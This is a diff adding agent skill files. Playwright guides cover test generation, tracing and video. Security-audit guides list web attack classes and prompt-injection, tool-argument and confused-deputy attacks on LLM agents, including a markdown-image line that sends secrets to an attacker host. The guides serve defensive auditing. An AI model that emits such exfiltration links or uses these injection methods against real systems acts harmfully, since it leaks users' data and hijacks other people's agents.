+**Do not** just open the app url with playwright-cli, always go through the test to capture any custom setup done there.
+
+Walk the scenario's `Steps:` one by one with `playwright-cli`, treating the spec as the plan and the live app as the source of truth. If a step is vague ("click the button" — which button?), references an element that no longer exists, or contradicts the app's actual behaviour, use your judgement: update the spec to match what the app really does, then keep going. Editing the spec mid-generation is expected.
+
+Every action prints the equivalent Playwright TypeScript (see [How generation works](#0-how-generation-works)):
+
+```bash
+playwright-cli snapshot                         # find refs
+playwright-cli fill e3 "John Doe"               # -> page.getByRole('textbox', {...}).fill(...)
+playwright-cli press Enter
+playwright-cli click e7
+```
+
+For each `- expect:` bullet, add an explicit assertion. See [How generation works](#0-how-generation-works) for details.
+
+Collect the generated code and write the test file at the path given in the spec:
+
+```ts
+// spec: specs/basic-operations.plan.md
+// seed: tests/seed.spec.ts
+import { test, expect } from './fixtures';   // or '@playwright/test' if no fixtures file
+
+test.describe('Signing in and out', () => {
+  test('should sign in', async ({ page }) => {
+    // 1. Navigate to the application
+    // (handled by the seed fixture)
+
+    // 2. Type 'John Doe' into the username field
+    await page.getByRole('textbox', { name: 'username' }).fill('John Doe');
+
+    // 3. Type password
+    await page.getByRole('textbox', { name: 'password' }).fill('TestPassword');
+
+    // 4. Press Enter to submit
+    await page.getByRole('textbox', { name: 'password' }).press('Enter');
+
+    await expect(page.getByRole('heading')).toContainText('Welcome, John Doe!');
+  });
+});
+```
+
+Rules:
+
+- **One test per file.** File path, describe name, and test name come verbatim from the spec (minus the ordinal).
+- Prefix each numbered step with a `// N. <step text>` comment before its actions.
+- Use the describe group name verbatim from the spec (no `1.` ordinal).
+- Import from `./fixtures` if the project has one; otherwise `@playwright/test`.
+- **Important**: close the CLI session and stop the background test before moving to the next scenario.
+
+### 2.3 Generate multiple scenarios
+
+Loop 2.2 over the targeted scenarios one at a time, restarting the seed between each so every test starts from a clean page. This is safe to parallelise due to unique generated session names - just make sure each test run is stopped.
+
+### 2.4 Run generated tests
+
+After generation, run the new tests once:
+
+```bash
+PLAYWRIGHT_HTML_OPEN=never npx playwright test tests/<group>/<scenario>.spec.ts
+```
+
+Any failure goes to Section 3.
+
+---
+
+## 3. Heal
+
+Goal: fix failing tests, and update the spec if the app's intended behaviour changed.
+
+### 3.1 Find failing tests
+
+```bash
+PLAYWRIGHT_HTML_OPEN=never npx playwright test
+```
+
+Record the list of failing `<file>:<line>` entries and process them one at a time. Do not attempt parallel fixes — shared state and the single CLI session make that fragile.
+
+### 3.2 Debug one failure
+
+Run the single failing test in debug mode in the background, then attach:
+
+```bash
+PLAYWRIGHT_HTML_OPEN=never npx playwright test tests/<group>/<scenario>.spec.ts:<line> --debug=cli
+# wait for "Debugging Instructions" and the tw-XXXX session name
+playwright-cli attach tw-XXXX
+```
+
+The test is paused at the start. Step forward or run to until just before the failing action or assertion, then diagnose:
+
+```bash
+playwright-cli snapshot                # did the element change / move / rename?
+playwright-cli console                 # app-side errors?
+playwright-cli requests                # failed request? wrong payload?
+playwright-cli show --annotate         # ask the user to point somewhere
+```
+
+Common causes: selector drift, new wrapper element, label/ARIA rename, timing (transition, async load), assertion text updated in the app, test data leaking between runs.
+
+Rehearse the corrected interaction with `playwright-cli` — the generated code in the output is what you paste back into the test.
+
+### 3.3 Apply the fix
+
+Edit the test file: update the locator, assertion, step order, or inputs to match the corrected behaviour. Stop the background debug run. Rerun the single test to confirm green.
+
+Never skip hooks or add sleeps as a fix. Never use `networkidle`.
+
+### 3.4 Reconcile with the spec
+
+Open the spec referenced by the `// spec:` header in the test file and locate the scenario that matches the test.
+
+- **Fix was purely technical** (locator drift, better assertion shape) and the spec's user-level behaviour still matches the app → leave the spec alone.
+- **Fix changed user-visible steps, inputs, order, or expected outcomes** that the spec describes → update the spec to match reality. Keep the scenario id and file path stable; only the step / expect lines change.
+- **Unclear whether the app change is intentional** (spec is stale) **or a regression** (test was right, app is wrong) → **stop and ask the user**. Provide:
+  - the scenario id (e.g. `2.3`),
+  - the spec lines that no longer match,
+  - the observed app behaviour (quote a snapshot excerpt or a concrete outcome).
+
+Only after the user answers, either update the spec (intentional change) or file/flag the test as covering a bug (regression).
+
+### 3.5 Iteration and giving up
+
+- Fix failures one at a time; rerun after each.
+- If after thorough investigation you are confident the test is correct but the app is wrong *and* the user has confirmed it's a bug: mark the test `test.fixme(...)` with a comment pointing at the user's decision or issue link. Never silently skip.
+
+---
+
+## Cross-references
+
+| For... | See |
+|---|---|
+| `--debug=cli` / attach mechanics | [playwright-tests.md](playwright-tests.md) |
+| Mocking requests during exploration/generation | [request-mocking.md](request-mocking.md) |
+| Managing the CLI browser session | [session-management.md](session-management.md) |

--- a/.agents/skills/playwright-cli/references/tracing.md
+++ b/.agents/skills/playwright-cli/references/tracing.md
@@ -1,0 +1,139 @@
+# Tracing
+
+Capture detailed execution traces for debugging and analysis. Traces include DOM snapshots, screenshots, network activity, and console logs.
+
+## Basic Usage
+
+```bash
+# Start trace recording
+playwright-cli tracing-start
+
+# Perform actions
+playwright-cli open https://example.com
+playwright-cli click e1
+playwright-cli fill e2 "test"
+
+# Stop trace recording
+playwright-cli tracing-stop
+```
+
+## Trace Output Files
+
+When you start tracing, Playwright creates a `.playwright-cli/traces/` directory with several files:
+
+### `trace-{timestamp}.trace`
+
+**Action log** - The main trace file containing:
+- Every action performed (clicks, fills, navigations)
+- DOM snapshots before and after each action
+- Screenshots at each step
+- Timing information
+- Console messages
+- Source locations
+
+### `trace-{timestamp}.network`
+
+**Network log** - Complete network activity:
+- All HTTP requests and responses
+- Request headers and bodies
+- Response headers and bodies
+- Timing (DNS, connect, TLS, TTFB, download)
+- Resource sizes
+- Failed requests and errors
+
+### `resources/`
+
+**Resources directory** - Cached resources:
+- Images, fonts, stylesheets, scripts
+- Response bodies for replay
+- Assets needed to reconstruct page state
+
+## What Traces Capture
+
+| Category | Details |
+|----------|---------|
+| **Actions** | Clicks, fills, hovers, keyboard input, navigations |
+| **DOM** | Full DOM snapshot before/after each action |
+| **Screenshots** | Visual state at each step |
+| **Network** | All requests, responses, headers, bodies, timing |
+| **Console** | All console.log, warn, error messages |
+| **Timing** | Precise timing for each operation |
+
+## Use Cases
+
+### Debugging Failed Actions
+
+```bash
+playwright-cli tracing-start
+playwright-cli open https://app.example.com
+
+# This click fails - why?
+playwright-cli click e5
+
+playwright-cli tracing-stop
+# Open trace to see DOM state when click was attempted
+```
+
+### Analyzing Performance
+
+```bash
+playwright-cli tracing-start
+playwright-cli open https://slow-site.com
+playwright-cli tracing-stop
+
+# View network waterfall to identify slow resources
+```
+
+### Capturing Evidence
+
+```bash
+# Record a complete user flow for documentation
+playwright-cli tracing-start
+
+playwright-cli open https://app.example.com/checkout
+playwright-cli fill e1 "4111111111111111"
+playwright-cli fill e2 "12/25"
+playwright-cli fill e3 "123"
+playwright-cli click e4
+
+playwright-cli tracing-stop
+# Trace shows exact sequence of events
+```
+
+## Trace vs Video vs Screenshot
+
+| Feature | Trace | Video | Screenshot |
+|---------|-------|-------|------------|
+| **Format** | .trace file | .webm video | .png/.jpeg image |
+| **DOM inspection** | Yes | No | No |
+| **Network details** | Yes | No | No |
+| **Step-by-step replay** | Yes | Continuous | Single frame |
+| **File size** | Medium | Large | Small |
+| **Best for** | Debugging | Demos | Quick capture |
+
+## Best Practices
+
+### 1. Start Tracing Before the Problem
+
+```bash
+# Trace the entire flow, not just the failing step
+playwright-cli tracing-start
+playwright-cli open https://example.com
+# ... all steps leading to the issue ...
+playwright-cli tracing-stop
+```
+
+### 2. Clean Up Old Traces
+
+Traces can consume significant disk space:
+
+```bash
+# Remove traces older than 7 days
+find .playwright-cli/traces -mtime +7 -delete
+```
+
+## Limitations
+
+- Traces add overhead to automation
+- Large traces can consume significant disk space
+- Some dynamic content may not replay perfectly

--- a/.agents/skills/playwright-cli/references/video-recording.md
+++ b/.agents/skills/playwright-cli/references/video-recording.md
@@ -1,0 +1,143 @@
+# Video Recording
+
+Capture browser automation sessions as video for debugging, documentation, or verification. Produces WebM (VP8/VP9 codec).
+
+## Basic Recording
+
+```bash
+# Open browser first
+playwright-cli open
+
+# Start recording
+playwright-cli video-start demo.webm
+
+# Add a chapter marker for section transitions
+playwright-cli video-chapter "Getting Started" --description="Opening the homepage" --duration=2000
+
+# Navigate and perform actions
+playwright-cli goto https://example.com
+playwright-cli snapshot
+playwright-cli click e1
+
+# Add another chapter
+playwright-cli video-chapter "Filling Form" --description="Entering test data" --duration=2000
+playwright-cli fill e2 "test input"
+
+# Stop and save
+playwright-cli video-stop
+```
+
+## Best Practices
+
+### 1. Use Descriptive Filenames
+
+```bash
+# Include context in filename
+playwright-cli video-start recordings/login-flow-2024-01-15.webm
+playwright-cli video-start recordings/checkout-test-run-42.webm
+```
+
+### 2. Record entire hero scripts.
+
+When recording a video for the user or as a proof of work, it is best to create a code snippet and execute it with run-code.
+It allows inserting appropriate pauses between the actions and annotating the video. There are new Playwright APIs for that.
+
+1) Perform scenario using CLI and take note of all locators and actions. You'll need those locators to request their bounding boxes for highlight.
+2) Create a file with the intended script for video (below). Use pressSequentially w/ delay for nice typing, make reasonable pauses.
+3) Use playwright-cli run-code --filename your-script.js
+
+**Important**: Overlays are `pointer-events: none` — they do not interfere with page interactions. You can safely keep sticky overlays visible while clicking, filling, or performing any actions on the page.
+
+```js
+async page => {
+  await page.screencast.start({ path: 'video.webm', size: { width: 1280, height: 800 } });
+  await page.goto('https://demo.playwright.dev/todomvc');
+
+  // Show a chapter card — blurs the page and shows a dialog.
+  // Blocks until duration expires, then auto-removes.
+  // Use this for simple use cases, but always feel free to hand-craft your own beautiful
+  // overlay via await page.screencast.showOverlay().
+  await page.screencast.showChapter('Adding Todo Items', {
+    description: 'We will add several items to the todo list.',
+    duration: 2000,
+  });
+
+  // Perform action
+  await page.getByRole('textbox', { name: 'What needs to be done?' }).pressSequentially('Walk the dog', { delay: 60 });
+  await page.getByRole('textbox', { name: 'What needs to be done?' }).press('Enter');
+  await page.waitForTimeout(1000);
+
+  // Show next chapter
+  await page.screencast.showChapter('Verifying Results', {
+    description: 'Checking the item appeared in the list.',
+    duration: 2000,
+  });
+
+  // Add a sticky annotation that stays while you perform actions.
+  // Overlays are pointer-events: none, so they won't block clicks.
+  const annotation = await page.screencast.showOverlay(`
+    <div style="position: absolute; top: 8px; right: 8px;
+      padding: 6px 12px; background: rgba(0,0,0,0.7);
+      border-radius: 8px; font-size: 13px; color: white;">
+      ✓ Item added successfully
+    </div>
+  `);
+
+  // Perform more actions while the annotation is visible
+  await page.getByRole('textbox', { name: 'What needs to be done?' }).pressSequentially('Buy groceries', { delay: 60 });
+  await page.getByRole('textbox', { name: 'What needs to be done?' }).press('Enter');
+  await page.waitForTimeout(1500);
+
+  // Remove the annotation when done
+  await annotation.dispose();
+
+  // You can also highlight relevant locators and provide contextual annotations.
+  const bounds = await page.getByText('Walk the dog').boundingBox();
+  await page.screencast.showOverlay(`
+    <div style="position: absolute;
+      top: ${bounds.y}px;
+      left: ${bounds.x}px;
+      width: ${bounds.width}px;
+      height: ${bounds.height}px;
+      border: 1px solid red;">
+    </div>
+    <div style="position: absolute;
+      top: ${bounds.y + bounds.height + 5}px;
+      left: ${bounds.x + bounds.width / 2}px;
+      transform: translateX(-50%);
+      padding: 6px;
+      background: #808080;
+      border-radius: 10px;
+      font-size: 14px;
+      color: white;">Check it out, it is right above this text
+    </div>
+  `, { duration: 2000 });
+
+  await page.screencast.stop();
+}
+```
+
+Embrace creativity, overlays are powerful.
+
+### Overlay API Summary
+
+| Method | Use Case |
+|--------|----------|
+| `page.screencast.showChapter(title, { description?, duration?, styleSheet? })` | Full-screen chapter card with blurred backdrop — ideal for section transitions |
+| `page.screencast.showOverlay(html, { duration? })` | Custom HTML overlay — use for callouts, labels, highlights |
+| `disposable.dispose()` | Remove a sticky overlay added without duration |
+| `page.screencast.hideOverlays()` / `page.screencast.showOverlays()` | Temporarily hide/show all overlays |
+
+## Tracing vs Video
+
+| Feature | Video | Tracing |
+|---------|-------|---------|
+| Output | WebM file | Trace file (viewable in Trace Viewer) |
+| Shows | Visual recording | DOM snapshots, network, console, actions |
+| Use case | Demos, documentation | Debugging, analysis |
+| Size | Larger | Smaller |
+
+## Limitations
+
+- Recording adds slight overhead to automation
+- Large recordings can consume significant disk space

--- a/.agents/skills/security-audit/AI-AND-LLM.md
+++ b/.agents/skills/security-audit/AI-AND-LLM.md
@@ -1,0 +1,67 @@
+# AI, LLM, and Agent Hunting
+
+#### When to use this file
+
+Reach for this file when the target embeds a language model in a trust-sensitive path: chatbots and assistants, RAG pipelines, agent/tool-calling loops, MCP servers and clients, code that builds prompts from untrusted input, or code that consumes model output and acts on it. These targets fail differently from ordinary web apps — the dangerous data flow is *untrusted text → model → capability or sink*, and the model is a confused deputy that will faithfully carry attacker instructions across a trust boundary the developer assumed the model would respect. It won't.
+
+Use this alongside `ATTACK-CLASSES.md`, not instead of it: the transport is still HTTP, the tools still hit SQL/shell/filesystem sinks, and access control still applies. This file covers the model-specific layer on top.
+
+Pick the relevant classes based on Phase 1. Split per subsystem (retrieval, tool dispatch, output rendering) for large targets.
+
+## Core discipline (include in every agent prompt for this domain)
+
+```
+- "The model can be prompt-injected" is NOT a finding on its own. Prompt injection that only affects the attacker's own session and their own output is a party trick. A finding requires the injection to CROSS A BOUNDARY: reach a victim's context, invoke a capability the requester lacks, exfiltrate data the requester can't see, or drive a downstream sink the attacker couldn't otherwise reach (server-side SQL/shell/SSRF beyond their own session). Name the boundary crossed.
+- The bug is in the CODE, not the model. The finding is the missing code-level gate between attacker-influenceable input and a dangerous capability or sink — point at the line that grants the capability, trusts the output, or feeds the context, not the model's mood. Non-determinism is not a defense: the model's probability of complying is an exploitability detail, never a reporting blocker. If the code makes the output harmless (output that never reaches a sink), there is no finding regardless of what the model can be talked into saying.
+- Model output is untrusted input. Trace it to its sink with the same rigor as any user input. "It came from our model" is the exact assumption being attacked.
+- A guardrail prompt ("never reveal the system prompt", "refuse harmful requests") is not a security control. Do not credit it as a mitigation. If the only thing standing between the attacker and impact is instructions in the prompt, the boundary is undefended.
+```
+
+## Prompt-injection attack classes (subagent_type: `general`)
+
+**Indirect injection via retrieved / ingested content**
+The high-value class. Attacker plants instructions in data the model later ingests in *someone else's* session: a RAG document, an indexed web page, a file upload, an email, an issue/PR body, a tool's response, a filename. Trace every source that reaches the prompt context and ask "who can write this, and whose session does it fire in?" Find the ingestion path; confirm the content reaches the context window unfiltered; confirm that context has a capability worth hijacking.
+
+**Tool-argument injection (model output → sink)**
+The model emits a tool call and the code executes it with model-generated arguments. Those arguments hit a real sink — SQL (`query(args.filter)`), shell (`exec(args.cmd)`), file path (`readFile(args.path)`), HTTP (`fetch(args.url)` → SSRF), or another API. The code trusts the arguments because "the model produced structured output." Trace each tool handler's parameters to their sink and validate them at the handler like any request body.
+
+**Direct injection into a privileged capability**
+Direct (same-session) injection only matters when the model can do something the *user* is not authorized to do directly. If the assistant runs tools under a service identity, or has a system prompt containing secrets, or can reach internal endpoints, then a user talking the model into using those crosses a privilege boundary even in their own session. If the model can only do what the user could already do via the UI, direct injection is not a finding. Hunt step: enumerate every capability the assistant holds that its users don't, then check whether same-session user text can steer the model into each.
+
+**Prompt-template / delimiter injection**
+Untrusted input concatenated into the prompt without fencing or role separation, so the attacker forges structure the orchestrator trusts: a fake system turn, a fabricated prior conversation turn, or a counterfeit tool result. The finding is the assembly code — the concatenation that lets user bytes impersonate a trusted role — not the model obeying them. Find where the prompt is built and whether untrusted spans are delimited or escaped from control text.
+
+## Agent and tool-calling attack classes (subagent_type: `general`)
+
+**Excessive agency / confused-deputy authority**
+The agent executes tools under *its own* identity (service account, broad API key, DB superuser) rather than the requesting user's. Every tool call is then a privilege-escalation vector: the user asks, the agent acts with more authority than the user has. Check whether tool execution re-checks the *user's* permission on the *specific resource*, or just that "the agent is allowed to call this tool." The same gap at the parameter level is IDOR through tools: `get_document(id)` / `read_file(path)` with the ID filled from user text and no check that *this* user may reach *that* resource — endpoint IDOR reached by asking. Common false positive: a shared service credential that runs every query *scoped to the authenticated user's ID* is normal, safe architecture — not a confused deputy.
+
+**Unbounded action loops / cost and side-effect abuse**
+Agent loops that call tools until a goal is met: can an attacker drive an expensive or irreversible loop (spend, send, delete, external API calls) through a single crafted request? Look for tool calls with side effects inside a model-controlled iteration with no per-action authorization or budget. The impact that makes this a finding crosses out of the attacker's own session — it hits the operator's bill, a shared rate/quota limit, or other tenants' availability (denial-of-wallet), so it survives the "capability they already have" test even when the attacker only touches their own request.
+
+**Sub-agent / MCP trust inheritance**
+When an agent spawns sub-agents or connects to MCP servers, what identity and context do they inherit? A sub-agent or tool server that receives the full session, credentials, or a broader capability set than the task needs is a lateral-movement primitive. A malicious or compromised MCP server is an attacker that speaks directly into the model's context — treat its responses as indirect injection.
+
+## Output-handling and disclosure attack classes (subagent_type: `general`)
+
+**Insecure output rendering (XSS / injection via model output)**
+Model output rendered as HTML/Markdown without sanitization → stored/reflected XSS. Markdown image/link rendering is the classic exfiltration channel: the model emits `![x](https://attacker/?d=<secret from context>)` and the client fetches it, leaking context to the attacker's server. Check where model output is displayed and whether it's treated as trusted HTML. The image-exfil channel only fires if the render surface auto-loads remote resources and no CSP `img-src` restricts the destination — if the rendering client is out of scope or unknown (native app, terminal, CSP-locked web UI), the sink is unconfirmed: treat it as unverifiable, not a finding.
+
+**System-prompt / context extraction to a real secret**
+Extraction is only a finding if the context actually contains something sensitive — API keys, other users' data, internal URLs, hidden business rules that gate access. Confirm the secret is really in the context (read the prompt-assembly code) before reporting. A leaked generic "you are a helpful assistant" prompt is not a finding.
+
+**Cross-session / multi-tenant context bleed**
+Conversation history, embeddings, or the KV/prompt cache keyed too broadly, so one user's context appears in another's session. Trace the cache/session key: is it scoped per user, or is there a path where a shared key mixes tenants? Related: retrieval (vector or keyword search) that lacks a per-tenant metadata/ACL filter at query time pulls another tenant's chunks into context — IDOR at the retrieval layer; confirm the query itself applies the tenant filter, not just that documents carry a tenant field. These are code bugs (bad cache key, shared buffer, unfiltered query), not model behavior — verify them in the storage/retrieval layer.
+
+## Universal moves (apply across the above)
+
+- **Draw the boundary before hunting.** Enumerate: what identity do tools run as, what's in the context window, who can write to each context source, where does output go. Most AI findings fall out of a correct map of these four; most AI false positives come from not drawing it.
+- **Find the capability, then find who can reach it.** Start from the most dangerous tool (delete, spend, exec, fetch-internal) and work backwards to whether untrusted text can reach its arguments. Power × reachability, same as any privileged interface.
+
+## Validation rules (apply before reporting ANY finding here)
+
+1. **Name the boundary crossed.** State exactly who the attacker is, whose session/identity the payload executes in, and what they get that they couldn't get directly. If attacker and victim are the same principal and the capability is one they already have, it is not a finding.
+2. **For confused-deputy / excessive-agency claims, prove both halves.** Show (a) the tool performs no per-resource check scoped to the requesting user, AND (b) the action is one the user could not perform through a normal authenticated request. A shared service credential with per-user query scoping fails both tests and is not a finding.
+3. **Cite the trusting line and prove the taint reaches it.** For tool-argument and output findings, show the concrete sink (the `exec`/`query`/`fetch`/`innerHTML`) with model-influenced data reaching it unvalidated; for extraction/disclosure findings, cite the prompt-assembly code and confirm the secret or cross-tenant data is really in the context. If you can't cite the code, you have a black-box observation, not a finding.
+4. **Don't assert capabilities you can't see in source.** Claims that depend on deployment facts not in the repo — whether an "internal-only" endpoint is actually unreachable by the user, what a tool's target really exposes, which client renders the output — are unverifiable from source. If the user could reach the same thing directly (flat network, same origin), it is not a privilege crossing. Confirm the capability and the boundary in code, or mark it unverifiable rather than reporting it.
+5. **Return ONLY confirmed findings** with the boundary crossed, the trusting code path, and the observable result — or "No exploitable AI/LLM issues found" if that's honest.

--- a/.agents/skills/security-audit/ATTACK-CLASSES.md
+++ b/.agents/skills/security-audit/ATTACK-CLASSES.md
@@ -1,0 +1,116 @@
+# Attack Classes
+
+#### Attack classes — choose and split based on Phase 1
+
+Select attack classes relevant to the application type. Not every class applies to every codebase. The list below is a starting point — add application-specific ones based on Phase 1. For large codebases, split classes per subsystem.
+
+> **Native / binary / kernel targets** (C/C++/Rust-unsafe, kernel modules, parsers and decoders, reverse-engineering tooling, runtimes/JITs, firmware): the web-oriented classes below fit poorly. Use the memory-safety, binary, and kernel classes in [MEMORY-SAFETY-AND-BINARY.md](MEMORY-SAFETY-AND-BINARY.md) instead of or alongside them.
+>
+> **AI / LLM / agent targets** (chatbots, RAG pipelines, tool-calling agents, MCP servers/clients, anything that builds prompts from untrusted input or acts on model output): use the prompt-injection, agency, and output-handling classes in [AI-AND-LLM.md](AI-AND-LLM.md) alongside the classes below.
+>
+> **HTTP-protocol and auth targets** (reverse proxies, CDNs, API gateways, custom HTTP parsers, and anything implementing sessions, JWT, OAuth/OIDC, or SAML): use the request-framing, cache, and auth-protocol classes in [WEB-PROTOCOL-AND-AUTH.md](WEB-PROTOCOL-AND-AUTH.md) alongside the classes below.
+>
+> **Client-side / browser targets** (SPAs, browser extensions, embedded webviews, anything using `postMessage`, CORS, or WebSockets, or that renders untrusted content in the DOM): use the DOM-injection, messaging-trust, and UI-redress classes in [CLIENT-SIDE.md](CLIENT-SIDE.md) alongside the classes below.
+
+**Injection** (subagent_type: `general`)
+Trace untrusted input from entry point to dangerous sink. What counts as a "dangerous sink" depends on the application:
+- Web apps: SQL queries, HTML output, shell commands, template engines, file paths, HTTP redirects, deserialization
+- Libraries: any function that processes caller-supplied data without validation — buffer operations, parsers, format strings
+- CLI tools: shell command construction, file path handling, environment variable interpolation
+- Services: query construction, message serialization, log injection, LDAP/XPATH queries
+- Client-side (browser/JS): DOM XSS, prototype pollution, `postMessage`/origin trust, and other browser-side classes — see [CLIENT-SIDE.md](CLIENT-SIDE.md)
+
+Don't just check the obvious direct paths. Look for indirect injection: data stored safely, then retrieved and used in a dangerous context by different code. Look for injection through field names, keys, headers, and metadata — not just values. Look for injection into secondary systems (logs, caches, search indexes, analytics).
+
+**Access control** (subagent_type: `general`)
+Can a caller do something they shouldn't? Go beyond checking whether permission checks exist — verify they check the *right* permission for the *right* resource via the *right* mechanism:
+- Is there a path to the same state change that checks a different (weaker) permission?
+- Can a field in the request body override what the permission system intended to restrict?
+- Are there endpoints that gate on authentication but forget authorization?
+- Does the same resource have multiple access paths with inconsistent checks?
+- What about bulk/batch/export/import operations — do they enforce per-item permissions?
+
+For complex access models, split into separate agents for auth bypass vs authorization logic.
+
+**Resource and file handling** (subagent_type: `general`)
+- Path traversal (reading/writing outside intended directories) — including through symlinks, encoded sequences, and null bytes
+- SSRF (making the application fetch attacker-controlled URLs) — including through redirects, DNS rebinding, and URL parser differentials
+- Unsafe deserialization, archive extraction (zip slip), temp file handling
+- Memory safety (if applicable): buffer overflows, use-after-free, integer overflow
+- Race conditions on file operations (TOCTOU between check and use)
+
+**Cryptography and secrets** (subagent_type: `general`)
+- Weak randomness for security-critical values (tokens, keys, nonces)
+- Hardcoded secrets, secrets in logs, error messages, URLs, or client-visible responses
+- Broken key derivation, missing HMAC verification, nonce reuse
+- Timing side-channels on secret comparison
+- Misuse of crypto primitives (ECB mode, unauthenticated encryption, static IVs, etc.)
+- What happens when crypto operations fail? Does the error path fall back to no-crypto?
+
+**Business logic** (subagent_type: `general`)
+This is where the real bugs hide. Standard scanners can't find logic errors. For each major workflow:
+- **State machine violations**: Can you skip steps? Go backwards? Reach an invalid state? What happens if you replay a completed flow? What about partial failure — if step 2 of 3 fails, is step 1 rolled back?
+- **Race conditions with business impact**: Concurrent operations that produce invalid states (double-spend, double-approve, lost updates). Focus on operations that check-then-act non-atomically.
+- **Numeric/quantity manipulation**: Negative values, zero values, overflow, precision loss, type coercion between string and number.
+- **Access boundary violations**: Not "does the permission check exist" but "is it the right check for the business rule?" Can input to one operation bypass a restriction enforced on a different operation for the same effect?
+- **Implicit trust assumptions**: Data from storage, config, other components, or plugins assumed safe because "we validated it on the way in." What if a different code path wrote it?
+- **Time-based logic**: Expiry checks, scheduling, rate windows, clock skew. What happens at exact boundary moments? What about timezone differences between components?
+- **Default and fallback behavior**: What's the security posture when config is missing? When a feature flag is off? When a dependency is unavailable? When the system is mid-migration?
+
+**Feature abuse and data leakage** (subagent_type: `general`)
+Legitimate features used for unintended purposes. Don't look for bugs in the code — look for bugs in the design:
+- **Export/backup as exfiltration**: Can a low-privilege user trigger an export, snapshot, or backup that includes data above their access level? Can they export other users' data? Does the export include deleted/draft/private content? Revision history that was supposed to be pruned?
+- **Import/restore as injection**: Can import overwrite existing data? Can it create records that bypass normal validation? Can it inject content into collections the user doesn't have write access to? Does it respect the same permission model as the UI?
+- **Search/filter/sort as oracle**: Can search queries reveal whether content exists that the user can't directly access? Do filter parameters let users probe statuses, roles, or fields they shouldn't know about? Does sorting by a hidden field reveal its values through result ordering?
+- **Enumeration through side effects**: Do error messages differ between "doesn't exist" and "you don't have access"? Do response times differ? Response sizes? HTTP status codes? Can you enumerate users through password reset, invite, or registration flows?
+- **Preview/draft/staging leakage**: Are preview tokens scoped to one item or do they unlock broader access? Can draft content be discovered through search, RSS feeds, sitemaps, or API listing endpoints? Can cache headers cause a CDN to serve private content publicly?
+- **Notification/webhook as SSRF**: Can a user set a notification URL, webhook URL, or callback URL that the server fetches? Is it validated against internal networks? What about after a redirect?
+
+**Chained attacks and trust boundaries** (subagent_type: `general`)
+Individual safe behaviors that become dangerous in combination. Think about the full system:
+- **Multi-step chains**: Map out what a low-privilege user CAN do, then look for combinations. Info disclosure (learning a resource ID) + IDOR (accessing it directly) + missing rate limit (brute-forcing the ID space). Open redirect + OAuth callback = token theft. Benign XSS in a low-value context + CSRF to escalate it.
+- **Cross-component trust gaps**: Component A validates input and passes it to component B. Does B re-validate or trust A? What if A's validation is subtly different from what B needs (e.g., A allows 255 chars but B truncates at 128, creating a different string)? What about plugin/extension trust — can third-party code manipulate core state, bypass permission hooks, or access storage directly?
+- **Second-order attacks**: Data safe when stored but dangerous when used in a different context. A field name safe in SQL becomes a key in a JSON path expression. A slug safe in a URL becomes part of a file path. Content stored HTML-escaped gets double-escaped or rendered in a context that expects raw text. Config values stored as strings get parsed as URLs, regexes, or templates.
+- **Scope and capability escalation**: Tokens, API keys, or OAuth scopes that grant broader access than their name implies. A `read` scope that also allows listing draft content. Session cookies that survive a role downgrade. Plugin capabilities that provide a stepping stone to higher access. MCP or AI tool integrations that inherit the user's full session.
+- **Timing and ordering**: Can you use a feature before setup/migration is complete? Act on a resource between soft-delete and hard-delete? Use a token between revocation and cache expiry? Exploit the gap between two non-atomic operations (check-then-act, read-then-write, validate-then-use)?
+- **Rollback and recovery abuse**: What happens when an operation is undone? Undelete, restore from backup, revert a revision, cancel a pending action. Does the rollback restore more than intended? Does it bypass current permissions? Can you restore a resource into a state that's no longer valid?
+
+**Wildcard** (subagent_type: `general`)
+You are not given a category. You are given the codebase and told to break it.
+
+Ignore the standard vulnerability classes — other agents are covering those. Your job is to find the thing nobody thought to look for. Read code that looks boring. Follow functions that seem unrelated to security. Get curious about the weird stuff.
+
+Some starting points, but don't limit yourself to these:
+- What's the strangest code in the codebase? Why does it exist? What happens if it's abused?
+- Are there any features that feel half-finished, experimental, or bolted on? Those have the weakest security because they got the least review.
+- What happens if you use the API in a way the frontend never would? The UI constrains users, but the API doesn't. What API calls are possible but never made by the client?
+- Are there any hidden or undocumented endpoints, parameters, headers, or features? Look at route registrations, middleware, and config for things that aren't in the docs.
+- What happens when you mix features that weren't designed to work together? Localization + preview + caching. Import + plugins + webhooks. OAuth + impersonation + API keys.
+- Is there anything interesting in the git history? Reverted security fixes, commented-out auth checks, secrets that were committed then removed (still in history).
+- What would you do if you had a valid account but wanted to cause maximum damage without being detected? Not escalation — sabotage. Corrupting data, poisoning caches, exhausting resources, creating confusing state.
+- Are there any operations that are irreversible? What if you trick an admin into performing one?
+- What assumptions does the code make about the environment? That the database is local, that the clock is accurate, that DNS is trustworthy, that the filesystem is case-sensitive?
+- Look at the test files — what are they NOT testing? What edge cases did the developer think about (tests exist) vs. what they didn't (no tests)?
+
+Follow rabbit holes. If something looks weird, dig. If a function has a comment explaining why it's safe, verify the explanation. If a variable is named `temp` or `hack` or `legacy`, read every line of it.
+
+**Obvious things** (subagent_type: `general`)
+The other agents are hunting for subtle bugs. This agent checks the dumb stuff that's easy to overlook because everyone assumes someone else already checked it:
+- Are there any hardcoded passwords, API keys, tokens, or secrets in the source? (grep for `password`, `secret`, `apikey`, `token`, `Bearer`, `-----BEGIN`, common default passwords)
+- Are there any TODO/FIXME/HACK/XXX comments that reference security? (`TODO: add auth`, `FIXME: validate input`, `HACK: skip permission check`)
+- Is debug mode / dev mode properly gated? Can it be enabled in production via environment variable, query parameter, or header?
+- Are there test/example/seed credentials that work in production?
+- Is there a `/debug`, `/admin`, `/test`, `/status`, `/health`, `/metrics`, `/env`, `/.env`, `/config` endpoint that's unprotected?
+- Are there any `.env`, `.env.local`, `credentials.json`, `*.pem`, `*.key` files checked into the repo?
+- Does the `.gitignore` actually cover secrets, uploads, and local config?
+- Are dependencies pinned? Are there known CVEs in the dependency tree? (check lockfiles)
+- Are there any `eval()`, `exec()`, `child_process`, `Function()`, `vm.runInContext`, `import()` with dynamic input?
+- Are CORS headers set to `*` or overly permissive? Is `Access-Control-Allow-Credentials` combined with a wildcard origin?
+- Are cookies missing `HttpOnly`, `Secure`, or `SameSite` attributes?
+- Are there any open redirects? (parameters named `redirect`, `return`, `next`, `url`, `goto`, `continue` that feed into redirects without validation)
+- Is TLS enforced? Are there any HTTP-only endpoints?
+- Are error responses in production returning stack traces, internal paths, or SQL errors?
+
+This agent doesn't need to be creative. It needs to be thorough and literal. Check every item. Report what it finds.
+
